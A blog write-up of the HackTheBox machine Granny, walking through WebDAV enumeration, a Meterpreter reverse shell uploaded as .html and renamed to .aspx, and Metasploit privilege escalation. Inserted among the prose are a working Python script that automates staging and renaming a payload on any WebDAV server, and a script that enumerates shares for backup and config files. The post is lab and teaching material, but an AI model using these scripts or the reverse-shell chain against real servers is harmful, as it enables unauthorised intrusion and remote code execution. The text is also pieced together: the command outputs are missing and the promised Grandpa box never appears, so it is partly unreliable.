Haxilio.com

My journey on becoming a hacker

Granny Hackthebox-WriteUp

Introduction

Christmas is a time for family. Therefore, today we’re doing Granny and Grandpa, both from hackthebox. This is a pretty easy box – except for when you get stuck in a rabbit-hole for hours. Let’s pretend no one does that …

Write-Up

As always, only take a peek if you really have to 😉

Here is what we’ll do:


Walkthrough

Since this is a pretty straightforward box, I’ll keep the explanations short this time and focus on the box itself.

Enumeration

First of all, as always, we nmap the box to learn about our attack surface:

Looks like WebDAV is running. In case you don’t know what that is: I didn’t either before cracking this box. The explanatory part at the end of this post gives some more details about it.

Assuming the scan is right, that would mean we could upload (PUT) files to the server and rename them (MOVE). That seems like an easy win. To confirm it, we run davtest, which tries to PUT a test file in every interesting extension and reports which ones the server accepts:

Vulnerability confirmed! We can upload .html and .txt files. Uploading a reverse shell as .html or .txt wouldn’t do us any good by itself, though: it would be served as static content, not executed. But remember, we have the MOVE right as well, and the extension check that limits what we may PUT evidently does not apply to the name we MOVE a file to. Let’s try to upload the shell as .html and rename it to _____.aspx afterwards.

Gaining a Foothold

First, let’s create the payload:

We want the reverse shell to open a Meterpreter session for Windows via TCP to 10.10.14.8 (my host, probably different for you) on port 1337 (which else could it be?). The payload format is aspx, but we save the file with an .html extension so the server accepts the upload.

Second, we upload and rename the file with cadaver:

Success! Now you can just start Metasploit and open a multi/handler listener that matches the payload (windows/meterpreter/reverse_tcp, LHOST 10.10.14.8, LPORT 1337). After requesting the renamed .aspx file on http://10.10.10.15 with your browser, the shell should pop. We’re in!
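The three steps above (check that the server allows PUT and MOVE, upload the payload under an accepted extension, rename it to .aspx) as one Python script. This is an added example, not part of the original post and not cadaver’s code: the port 80, the file names shell.html and shell.aspx and the sample Allow header are assumptions, and the payload file itself is the one msfvenom produces as described above (-p windows/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=1337 -f aspx, saved as .html).

```python
"""WebDAV stage-then-rename: PUT a payload under an accepted extension, MOVE it to .aspx."""
import http.client
import sys

# Constructed 'Allow' header of the kind an IIS WebDAV OPTIONS response carries;
# not captured from the box.
SAMPLE_ALLOW = ("OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, "
                "MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH")


def allowed_methods(allow_header):
    """Parse an HTTP 'Allow' header value into a set of upper-case method names."""
    return {m.strip().upper() for m in allow_header.split(",") if m.strip()}


def can_stage_and_rename(methods):
    """The trick needs PUT (to stage the file) and MOVE (to rename it)."""
    return {"PUT", "MOVE"} <= methods


def staged_and_final_names(basename, staged_ext=".html", final_ext=".aspx"):
    """Upload under an extension the server accepts, then MOVE to the one it executes."""
    return basename + staged_ext, basename + final_ext


def _do(conn, method, path, body=None, headers=None):
    """Send one request, drain the body and return the response (status + headers)."""
    conn.request(method, path, body=body, headers=headers or {})
    resp = conn.getresponse()
    resp.read()
    return resp


def deploy(host, port, local_file, basename="shell"):
    """Run the whole chain against host:port (assumed reachable); return each step's status."""
    staged, final = staged_and_final_names(basename)
    conn = http.client.HTTPConnection(host, port, timeout=10)
    opt = _do(conn, "OPTIONS", "/")
    methods = allowed_methods(opt.getheader("Allow", ""))
    if not can_stage_and_rename(methods):
        raise RuntimeError(f"server advertises {sorted(methods)}; need PUT and MOVE")
    with open(local_file, "rb") as f:
        payload = f.read()
    put = _do(conn, "PUT", "/" + staged, body=payload, headers={"Content-Type": "text/html"})
    # RFC 4918 MOVE: the new name goes in the Destination header as an absolute URL.
    move = _do(conn, "MOVE", "/" + staged,
               headers={"Destination": f"http://{host}:{port}/{final}", "Overwrite": "T"})
    conn.close()
    return {"options": opt.status, "put": put.status, "move": move.status,
            "trigger": f"http://{host}:{port}/{final}"}


if __name__ == "__main__":
    # usage: python3 davdrop.py 10.10.10.15 80 shell.html   (host/port/file are assumptions)
    host, port, local_file = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    print(deploy(host, port, local_file))
```

A 201 on the PUT and a 201 or 204 on the MOVE mean the file is in place; bring up the multi/handler listener first, then request the trigger URL. If the OPTIONS check fails, the Allow header tells you which of PUT or MOVE is missing, which saves you from guessing why the rename silently does nothing.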

Privilege Escalation

This step is even quicker than gaining the initial access. We background our Meterpreter session in Metasploit, run the local exploit suggester (post/multi/recon/local_exploit_suggester) and get a couple of options. Luckily, my first try was a hit:

Just configure the module’s options, run it and ….

Aaaand we’re root. Congratulations!

If you don’t want to use Metasploit, you can just change the payload to a plain TCP reverse shell and catch it with a netcat listener. Enumerating the machine manually will show that the box is vulnerable to MS14-058. You can download that exploit and upload it via WebDAV (as .txt, rename it afterwards). That’s actually where I fell into the rabbit-hole… I tried downloading the file with the user on the box, who has no rights. Then I enumerated everything but couldn’t find a way to download a file. WebDAV was TOO obvious, I guess.

Anyway, for those of you who, like me, didn’t know WebDAV before, keep on reading. If you’re already familiar with it: Happy Hacking!


WebDAV Explanation

Personally, I didn’t know about WebDAV before doing this box. I’ll blame this lack of knowledge for the hours that I sank into the rabbit-hole.

WebDAV stands for Web Distributed Authoring and Versioning and is defined in RFC 4918. The RFC defines WebDAV as “an extension to the HTTP/1.1 protocol that allows clients to perform remote Web content authoring operations.” To me that sounds like the pre-pre-pre-predecessor to WordPress with a touch of FTP. Like a really basic, hard-to-manage Content-Management-/File-Transfer-and-Modification-System.

What you, as a hacker, should keep in mind is that it gives you the opportunity to remotely read and tamper with the files hosted on a server. This might leak sensitive information (backups, configuration files) or give you an easy way to drop a reverse shell onto the server – like in the example above.

Other than that, WebDAV can be used to group files into folders (“collections” in RFC terms) and manage metadata (“properties”) such as the author of a given file. The main difference to FTP – as it seems to me – is that you can modify the files on the server without the need to download them beforehand.
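The read side of what the paragraphs above describe, as an added example that is not part of the original post: a PROPFIND request lists a collection and returns each resource’s properties in a 207 Multi-Status XML document, which the script below parses and scans for leftover files worth reading. The Multi-Status body embedded here is constructed for offline use (shaped like an IIS response, not captured from the box), and the host 10.10.10.15, port 80 and the list of “sensitive” suffixes are assumptions.

```python
"""Listing a WebDAV share with PROPFIND and reading the per-file metadata it returns."""
import http.client
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

DAV = "{DAV:}"  # WebDAV properties live in the "DAV:" XML namespace (RFC 4918)

# Request body: ask for all properties of each resource.
PROPFIND_BODY = (b'<?xml version="1.0" encoding="utf-8"?>'
                 b'<D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>')

# Constructed 207 Multi-Status response for offline use; shaped like what a
# Depth: 1 PROPFIND on the site root returns, but not captured from the box.
SAMPLE_MULTISTATUS = b"""<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
  <D:response>
    <D:href>http://10.10.10.15/</D:href>
    <D:propstat>
      <D:prop>
        <D:resourcetype><D:collection/></D:resourcetype>
        <D:getlastmodified>Thu, 01 Jan 2015 00:00:00 GMT</D:getlastmodified>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
  <D:response>
    <D:href>http://10.10.10.15/images/</D:href>
    <D:propstat>
      <D:prop><D:resourcetype><D:collection/></D:resourcetype></D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
  <D:response>
    <D:href>http://10.10.10.15/index.html</D:href>
    <D:propstat>
      <D:prop>
        <D:resourcetype/>
        <D:getcontentlength>1433</D:getcontentlength>
        <D:getlastmodified>Thu, 01 Jan 2015 00:00:00 GMT</D:getlastmodified>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
  <D:response>
    <D:href>http://10.10.10.15/old/web.config.bak</D:href>
    <D:propstat>
      <D:prop>
        <D:resourcetype/>
        <D:getcontentlength>3120</D:getcontentlength>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
</D:multistatus>
"""


def parse_multistatus(body):
    """Turn a 207 Multi-Status body into a list of {path, is_dir, size, modified} dicts."""
    root = ET.fromstring(body)
    entries = []
    for resp in root.iter(DAV + "response"):
        href = resp.findtext(DAV + "href") or ""
        prop = resp.find(f"{DAV}propstat/{DAV}prop")
        is_dir = prop is not None and prop.find(f"{DAV}resourcetype/{DAV}collection") is not None
        size_text = prop.findtext(DAV + "getcontentlength") if prop is not None else None
        entries.append({
            "path": urlparse(href).path,  # IIS returns absolute hrefs; keep only the path
            "is_dir": is_dir,
            "size": int(size_text) if size_text else None,
            "modified": prop.findtext(DAV + "getlastmodified") if prop is not None else None,
        })
    return entries


def sensitive_files(entries, suffixes=(".bak", ".old", ".config", ".txt", ".zip", ".sql")):
    """Files whose names suggest leftovers worth reading: backups, configs, dumps (assumed list)."""
    return [e["path"] for e in entries if not e["is_dir"] and e["path"].lower().endswith(suffixes)]


def propfind(host, port=80, path="/", depth=1):
    """Live PROPFIND against host:port (assumed reachable); returns the parsed entries."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("PROPFIND", path, body=PROPFIND_BODY,
                 headers={"Depth": str(depth), "Content-Type": "text/xml"})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    if resp.status != 207:
        raise RuntimeError(f"expected 207 Multi-Status, got {resp.status}")
    return parse_multistatus(body)


if __name__ == "__main__":
    listing = parse_multistatus(SAMPLE_MULTISTATUS)
    for e in listing:
        print("dir " if e["is_dir"] else "file", e["path"], e["size"] or "", e["modified"] or "")
    print("worth a look:", sensitive_files(listing))
```

Depth: 1 lists only the immediate children of the collection; walk into each entry with is_dir set to enumerate the whole tree, and keep an eye on the size and modification properties, which are exactly the metadata the paragraph above mentions.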

I suppose that you’re not going to get in touch with WebDAV a lot anymore. At least I haven’t seen it out in the wild yet. In case you know why WebDAV is still in wider use, please tell me 🙂

That’ll be it for today. If you like what you read, or have any feedback, please let me know @h4xil10.


Happy Hacking!


H4xil10

Content creator

Become a hacker they said… It’ll be fun they said … AND IT ACTUALLY IS. Even better so than I thought it might be. Therefore, I want to make my learnings and knowledge as accessible as possible and hope many will join me on a journey into the great world of itsec.
